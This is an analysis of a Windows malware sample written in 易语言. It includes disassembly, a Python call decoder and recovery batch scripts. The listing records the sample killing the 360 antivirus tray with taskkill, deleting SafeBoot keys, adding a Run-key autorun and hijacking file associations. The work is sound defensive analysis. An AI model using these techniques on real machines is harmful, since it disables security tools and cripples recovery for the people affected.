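Reading hundreds of these push/call frames by hand is error-prone, so here is an added example (written for this page, not code from the original report or from the sample) that reconstructs the 易语言 runtime calls mechanically from the OllyDbg listing. It relies on the calling convention visible above: every argument is pushed right to left as a (type tag, 0, value) triple, then the argument count, then the library function id is loaded into ebx and 样本.0040E528 is called, after which the caller pops 12 * argc + 4 bytes. The function ids (0x6A4 = 写注册项, 0x2C0 = 运行, 0x300 = 信息框) and the registry root mapping (1 = HKCR, 3 = HKCU, 4 = HKLM) are assumptions taken from the analyst's comments and from the keys the sample writes; the two call frames embedded as input are copied verbatim from the listing. The script decodes the NoDrives double to 4294967295 and emits a .reg fragment that deletes the Policies values the sample sets; it also checks each frame against the add esp cleanup, which catches a mis-parsed frame.

```python
"""Added example (not from the original report): reconstruct the 易语言 library
calls from an OllyDbg listing.  The 易语言 compiler pushes each argument, right to
left, as a (type tag, 0, value) triple, then the argument count, loads the
library function id into ebx and calls the krnln dispatcher (样本.0040E528 here);
afterwards the caller pops 12 * argc + 4 bytes with add esp."""
import re
import struct

TYPE_BOOL, TYPE_INT, TYPE_STR, TYPE_DOUBLE = 0x80000002, 0x80000301, 0x80000004, 0x80000601
# Function ids -> names, taken from the analyst's comments (assumption: specific to this sample's krnln build).
FUNCS = {0x6A4: "写注册项", 0x2C0: "运行", 0x300: "信息框"}
# Root constants of the 易语言 registry API (assumption, consistent with the keys the sample writes).
ROOTS = {1: "HKEY_CLASSES_ROOT", 3: "HKEY_CURRENT_USER", 4: "HKEY_LOCAL_MACHINE"}

PUSH_RE = re.compile(r'\bpush\s+(\S+)(?:\s*;\s*ASCII\s+"(.*)")?')
MOV_EBX_RE = re.compile(r'\bmov\s+ebx,\s*0x([0-9A-Fa-f]+)')
CALL_RE = re.compile(r'\bcall\s+\S+\.0040E528\b')
ADD_ESP_RE = re.compile(r'\badd\s+esp,\s*0x([0-9A-Fa-f]+)')

def _operand(token, ascii_comment):
    """Immediate -> int; 样本.XXXXXXXX with an ASCII comment -> that string; register -> None."""
    if ascii_comment is not None:
        return ascii_comment
    if token.startswith("0x"):
        return int(token, 16)
    return int(token.split(".")[-1], 16) if "." in token else None

def decode_calls(listing):
    """Return [(function name, [args...])] for every dispatcher call in the listing."""
    stack, func_id, expect_cleanup, calls = [], None, None, []
    for line in listing.splitlines():
        if expect_cleanup is not None:
            m = ADD_ESP_RE.search(line)
            if m and int(m.group(1), 16) != expect_cleanup:  # frame mis-parsed
                raise ValueError(f"{m.group(0)} after call, expected {expect_cleanup:#x}")
            expect_cleanup = None
        if m := MOV_EBX_RE.search(line):
            func_id = int(m.group(1), 16)
        elif m := PUSH_RE.search(line):
            stack.append(_operand(m.group(1), m.group(2)))
        elif CALL_RE.search(line):
            argc, args = stack.pop(), []
            for _ in range(argc):  # the first argument is on top of the stack
                value, high, tag = stack.pop(), stack.pop(), stack.pop()
                if tag == 0:
                    args.append(None)  # omitted argument (three zero dwords)
                elif tag == TYPE_DOUBLE:  # 8-byte double, low dword pushed last
                    args.append(struct.unpack("<d", struct.pack("<II", value, high))[0])
                elif tag == TYPE_BOOL:
                    args.append(bool(value))
                else:
                    args.append(value)
            calls.append((FUNCS.get(func_id, f"func_{func_id:#x}"), args))
            expect_cleanup, stack = 12 * argc + 4, []
    return calls

def undo_reg(calls):
    """.reg fragment deleting the Policies values the sample writes.  Other writes
    (file associations, 360Safe switches, deleted SafeBoot keys) need original data."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for name, args in calls:
        if name == "写注册项" and len(args) == 3 and args[0] in ROOTS \
                and isinstance(args[1], str) and "\\Policies\\" in args[1]:
            key, _, value_name = args[1].rpartition("\\")
            lines += [f"[{ROOTS[args[0]]}\\{key}]", f'"{value_name}"=-', ""]
    return "\n".join(lines)

# Two call frames copied verbatim from the listing above.
LISTING = r"""
0040C471 68 01030080 push 0x80000301
0040C476 6A 00 push 0x0
0040C478 68 01000000 push 0x1
0040C47D 68 02000080 push 0x80000002
0040C482 6A 00 push 0x0
0040C484 68 00000000 push 0x0
0040C489 68 04000080 push 0x80000004
0040C48E 6A 00 push 0x0
0040C490 68 22924000 push 样本.00409222 ; ASCII "taskkill /f /im 360tray.exe"
0040C495 68 03000000 push 0x3
0040C49A BB C0020000 mov ebx,0x2C0
0040C49F E8 84200000 call 样本.0040E528
0040C4A4 83C4 28 add esp,0x28
0040C657 68 01060080 push 0x80000601
0040C65C 68 FFFFEF41 push 0x41EFFFFF
0040C661 68 0000E0FF push 0xFFE00000
0040C666 68 04000080 push 0x80000004
0040C66B 6A 00 push 0x0
0040C66D 68 21944000 push 样本.00409421 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives"
0040C672 68 01030080 push 0x80000301
0040C677 6A 00 push 0x0
0040C679 68 03000000 push 0x3
0040C67E 68 03000000 push 0x3
0040C683 BB A4060000 mov ebx,0x6A4
0040C688 E8 9B1E0000 call 样本.0040E528
0040C68D 83C4 28 add esp,0x28
"""

if __name__ == "__main__":
    decoded = decode_calls(LISTING)
    for name, args in decoded:
        print(name, args)
    print(undo_reg(decoded))
```

Running it on the two frames prints 运行 ['taskkill /f /im 360tray.exe', False, 1] and 写注册项 [3, 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives', 4294967295.0], followed by a .reg fragment with "NoDrives"=- under HKEY_CURRENT_USER. Feeding it the whole listing gives the complete list of registry writes in one pass; the .reg output only removes Policies values on purpose, since the 360Safe switches, the file associations and the deleted SafeBoot keys can only be restored from a clean system of the same Windows version.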
Next it deletes registry keys under SafeBoot (the 删除注册项 calls below, shown in decompiled 易语言 form; root 4 is HKEY_LOCAL_MACHINE) so that the machine can no longer be booted into Safe Mode: first every entry under SafeBoot\Network, then the SafeBoot\Network and SafeBoot keys themselves, which also removes the Minimal configuration:
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Network\”)
删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\”)
Continuing:
0040DFA4 83C4 10 add esp,0x10
0040DFA7 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040DFAA 68 DABA4000 push 样本.0040BADA ; ASCII ".vbs"
0040DFAF FF75 EC push dword ptr ss:[ebp-0x14]
0040DFB2 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32\"
0040DFB7 FF75 FC push dword ptr ss:[ebp-0x4]
0040DFBA B9 04000000 mov ecx,0x4
0040DFBF E8 35E1FFFF call 样本.0040C0F9 ; joins the four parts into "C:\WINDOWS\system32\43.vbs", which is then dropped
0040E08F 83C4 10 add esp,0x10
0040E092 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040E095 68 EBBA4000 push 样本.0040BAEB ; ASCII ".bat"
0040E09A FF75 EC push dword ptr ss:[ebp-0x14]
0040E09D 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32\"
0040E0A2 FF75 FC push dword ptr ss:[ebp-0x4]
0040E0A5 B9 04000000 mov ecx,0x4
0040E0AA E8 4AE0FFFF call 样本.0040C0F9 ; "C:\WINDOWS\system32\24.bat"
0040E1B3 83C4 10 add esp,0x10
0040E1B6 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040E1B9 68 EBBA4000 push 样本.0040BAEB ; ASCII ".bat"
0040E1BE FF75 EC push dword ptr ss:[ebp-0x14]
0040E1C1 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32\"
0040E1C6 FF75 FC push dword ptr ss:[ebp-0x4]
0040E1C9 B9 04000000 mov ecx,0x4
0040E1CE E8 26DFFFFF call 样本.0040C0F9 ; "C:\WINDOWS\system32\59.bat"
0040E29E 83C4 10 add esp,0x10
0040E2A1 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040E2A4 68 DABA4000 push 样本.0040BADA ; ASCII ".vbs"
0040E2A9 FF75 EC push dword ptr ss:[ebp-0x14]
0040E2AC 68 DFBA4000 push 样本.0040BADF ; ASCII "\system32\"
0040E2B1 FF75 FC push dword ptr ss:[ebp-0x4]
0040E2B4 B9 04000000 mov ecx,0x4
0040E2B9 E8 3BDEFFFF call 样本.0040C0F9 ; "C:\WINDOWS\system32\6.vbs"
0040E2F7 50 push eax
0040E2F8 68 04000080 push 0x80000004
0040E2FD 6A 00 push 0x0
0040E2FF 68 85BB4000 push 样本.0040BB85 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run\Explore.exe"
0040E304 68 01030080 push 0x80000301
0040E309 6A 00 push 0x0
0040E30B 68 04000000 push 0x4
0040E310 68 03000000 push 0x3
0040E315 BB A4060000 mov ebx,0x6A4
0040E31A E8 09020000 call 样本.0040E528 ; persistence: writes a Run value named Explore.exe under HKLM; the data is the string returned in eax
0040E31F 83C4 28 add esp,0x28
0040E322 8B5D E8 mov ebx,dword ptr ss:[ebp-0x18]
0040E325 85DB test ebx,ebx
0040E327 74 09 je short 样本.0040E332
0040E329 53 push ebx
0040E32A E8 FF010000 call 样本.0040E52E ; likely frees the temporary string
0040E32F 83C4 04 add esp,0x4
0040E332 68 01030080 push 0x80000301
0040E337 6A 00 push 0x0
0040E339 68 01000000 push 0x1
0040E33E 68 04000080 push 0x80000004
0040E343 6A 00 push 0x0
0040E345 68 92914000 push 样本.00409192 ; ASCII "SOFTWARE\360Safe\safemon\ExecAccess"
0040E34A 68 01030080 push 0x80000301
0040E34F 6A 00 push 0x0
0040E351 68 04000000 push 0x4
0040E356 68 03000000 push 0x3
0040E35B BB A4060000 mov ebx,0x6A4
0040E360 E8 C3010000 call 样本.0040E528 ; ExecAccess set back to 1
0040E365 83C4 28 add esp,0x28
0040E368 68 01030080 push 0x80000301
0040E36D 6A 00 push 0x0
0040E36F 68 01000000 push 0x1
0040E374 68 04000080 push 0x80000004
0040E379 6A 00 push 0x0
0040E37B 68 B6914000 push 样本.004091B6 ; ASCII "SOFTWARE\360Safe\safemon\MonAccess"
0040E380 68 01030080 push 0x80000301
0040E385 6A 00 push 0x0
0040E387 68 04000000 push 0x4
0040E38C 68 03000000 push 0x3
0040E391 BB A4060000 mov ebx,0x6A4
0040E396 E8 8D010000 call 样本.0040E528 ; MonAccess set back to 1
0040E39B 83C4 28 add esp,0x28
0040E39E 68 01030080 push 0x80000301
0040E3A3 6A 00 push 0x0
0040E3A5 68 01000000 push 0x1
0040E3AA 68 04000080 push 0x80000004
0040E3AF 6A 00 push 0x0
0040E3B1 68 D9914000 push 样本.004091D9 ; ASCII "SOFTWARE\360Safe\safemon\SiteAccess"
0040E3B6 68 01030080 push 0x80000301
0040E3BB 6A 00 push 0x0
0040E3BD 68 04000000 push 0x4
0040E3C2 68 03000000 push 0x3
0040E3C7 BB A4060000 mov ebx,0x6A4
0040E3CC E8 57010000 call 样本.0040E528 ; SiteAccess set back to 1
0040E3D1 83C4 28 add esp,0x28
0040E3D4 68 01030080 push 0x80000301
0040E3D9 6A 00 push 0x0
0040E3DB 68 01000000 push 0x1 93 0040E3E0 68 04000080 push 0x80000004 94 0040E3E5 6A 00 push 0x0 95 0040E3E7 68 FD914000 push 样本.004091FD ; ASCII "SOFTWARE\360Safe\safemon\UDiskAccess" 96 0040E3EC 68 01030080 push 0x80000301 97 0040E3F1 6A 00 push 0x0 98 0040E3F3 68 04000000 push 0x4 99 0040E3F8 68 03000000 push 0x3 100 0040E3FD BB A4060000 mov ebx,0x6A4 101 0040E402 E8 21010000 call 样本.0040E528 ; 将UDiskAccess键值设置成1 102 103 104 105 0040E40A 68 04000080 push 0x80000004 106 0040E40F 6A 00 push 0x0 107 0040E411 68 3E924000 push 样本.0040923E ; ASCII "jpegfile" 108 0040E416 68 04000080 push 0x80000004 109 0040E41B 6A 00 push 0x0 110 0040E41D 68 BFBB4000 push 样本.0040BBBF ; ASCII ".reg\" 111 0040E422 68 01030080 push 0x80000301 112 0040E427 6A 00 push 0x0 113 0040E429 68 01000000 push 0x1 114 0040E42E 68 03000000 push 0x3 115 0040E433 BB A4060000 mov ebx,0x6A4 116 0040E438 E8 EB000000 call 样本.0040E528 117 118 修改.reg文件关联。 119 120 0040E440 68 04000080 push 0x80000004 121 0040E445 6A 00 push 0x0 122 0040E447 68 3E924000 push 样本.0040923E ; ASCII "jpegfile" 123 0040E44C 68 04000080 push 0x80000004 124 0040E451 6A 00 push 0x0 125 0040E453 68 C5BB4000 push 样本.0040BBC5 ; ASCII ".exe\" 126 0040E458 68 01030080 push 0x80000301 127 0040E45D 6A 00 push 0x0 128 0040E45F 68 01000000 push 0x1 129 0040E464 68 03000000 push 0x3 130 0040E469 BB A4060000 mov ebx,0x6A4 131 0040E46E E8 B5000000 call 样本.0040E528 132 133 修改.exe文件关联 134 135 0040E49D 6A 00 push 0x0 136 0040E49F 6A 00 push 0x0 137 0040E4A1 6A 00 push 0x0 138 0040E4A3 68 01030080 push 0x80000301 139 0040E4A8 6A 00 push 0x0 140 0040E4AA 68 14000000 push 0x14 141 0040E4AF 68 04000080 push 0x80000004 142 0040E4B4 6A 00 push 0x0 143 0040E4B6 68 DA904000 push 样本.004090DA 144 0040E4BB 68 03000000 push 0x3 145 0040E4C0 BB 00030000 mov ebx,0x300 146 0040E4C5 E8 5E000000 call 样本.0040E528 //弹出最开始的窗口 147 0040E4CA 83C4 28 add esp,0x28 148 0040E4CD 8BE5 mov esp,ebp 149 0040E4CF 5D pop ebp 150 0040E4D0 C3 retn //结束
That concludes the code analysis.
Remediation:
Once infected, .inf, .txt, .exe and .reg files can no longer be used, but the virus does not restrict .bat or .vbs, probably because it needs to run its own .bat and .vbs files while it works. That is the way in.
Right-click > New is disabled, so take an existing file and change its extension instead. Rename the virus body itself to ".c", double-click it to open it as plain text, delete all the garbage inside, and type in the following (then save it with a .bat extension so that it runs):
@echo off
rem opens the Group Policy editor (gpedit.msc is present on the Professional editions of Windows)
gpedit.msc
pause&exit
In the Group Policy editor go to User Configuration > Administrative Templates > System; on the right, open "Prevent access to registry editing tools", set it to "Disabled", apply and close.
Once that is set, put the following into the .bat file:
@echo off
rem launches the Registry Editor, which the policy change above has just re-enabled
regedit.exe
pause&exit
Save and run it, and the Registry Editor opens. From there, change every registry value the virus modified back to its original setting.
File associations can be repaired from a batch file as well (using .exe as the example):
@echo off
rem map the .exe extension back to the exefile ProgID and restore its open command.
rem %1 and %* must be written as %%1 and %%* inside a .bat: otherwise the batch
rem interpreter expands them (to nothing) before ftype ever sees them.
assoc .exe=exefile
ftype exefile="%%1" %%*
pause&exit
Once all of that is done, run a full scan with an antivirus product.
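The manual steps above (re-enable regedit, undo the registry changes, repair the associations) can be collected into a single batch file, since .bat is the one file type the sample leaves runnable. The script below is an added example and is not part of the original write-up; it only reverts what the listing actually shows (the Run\Explore.exe autorun value, the registry-tools policy, the .exe and .reg associations hijacked to "jpegfile") plus the .txt and .inf associations the text says are broken. Two assumptions are not settled by the page: the listing does not show which hive the Run value lands in, so both HKCU and HKLM are checked, and the ftype commands are the stock Windows XP/7 defaults. The 360Safe\safemon values are left alone, because their original settings are not known; reinstall or repair that product after cleanup. Run it with administrative rights, as assoc/ftype write to HKEY_CLASSES_ROOT.

```batch
@echo off
rem recover.bat -- added example, not from the original analysis.
rem Reverts the sample's visible registry changes and file-association hijacks.
rem Assumptions: Run hive unknown (both HKCU and HKLM handled); stock XP/7 ftype defaults.
setlocal

echo === Before: autorun value and registry-tools policy ===
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Explore.exe 2>nul
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Explore.exe 2>nul
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools 2>nul

rem 1. Remove the autorun persistence (the value name imitates explorer.exe).
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Explore.exe /f 2>nul
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Explore.exe /f 2>nul

rem 2. Re-enable the Registry Editor. This is the value the gpedit.msc policy
rem    "Prevent access to registry editing tools" writes; 0 means not restricted.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 0 /f

rem 3. Restore file associations. Inside a .bat, %1 and %* are batch parameters,
rem    so they are doubled (%%1, %%*) to reach ftype as literal text.
assoc .exe=exefile
ftype exefile="%%1" %%*
assoc .reg=regfile
ftype regfile=regedit.exe "%%1" %%*
assoc .txt=txtfile
ftype txtfile=%SystemRoot%\system32\NOTEPAD.EXE %%1
assoc .inf=inffile
ftype inffile=%SystemRoot%\System32\NOTEPAD.EXE %%1

rem 4. Delete the dropped helper scripts if any are still on disk
rem    (the sample normally removes them itself after running).
for %%f in (43.vbs 24.bat 59.bat 6.vbs) do (
    if exist "%SystemRoot%\system32\%%f" del /f /q "%SystemRoot%\system32\%%f"
)

echo === After ===
assoc .exe
ftype exefile
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools

endlocal
pause
```

Run it once, check the "After" output shows `.exe=exefile`, `exefile="%1" %*` and `DisableRegistryTools 0x0`, then sign out and back in so Explorer picks up the restored associations before starting the antivirus scan.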
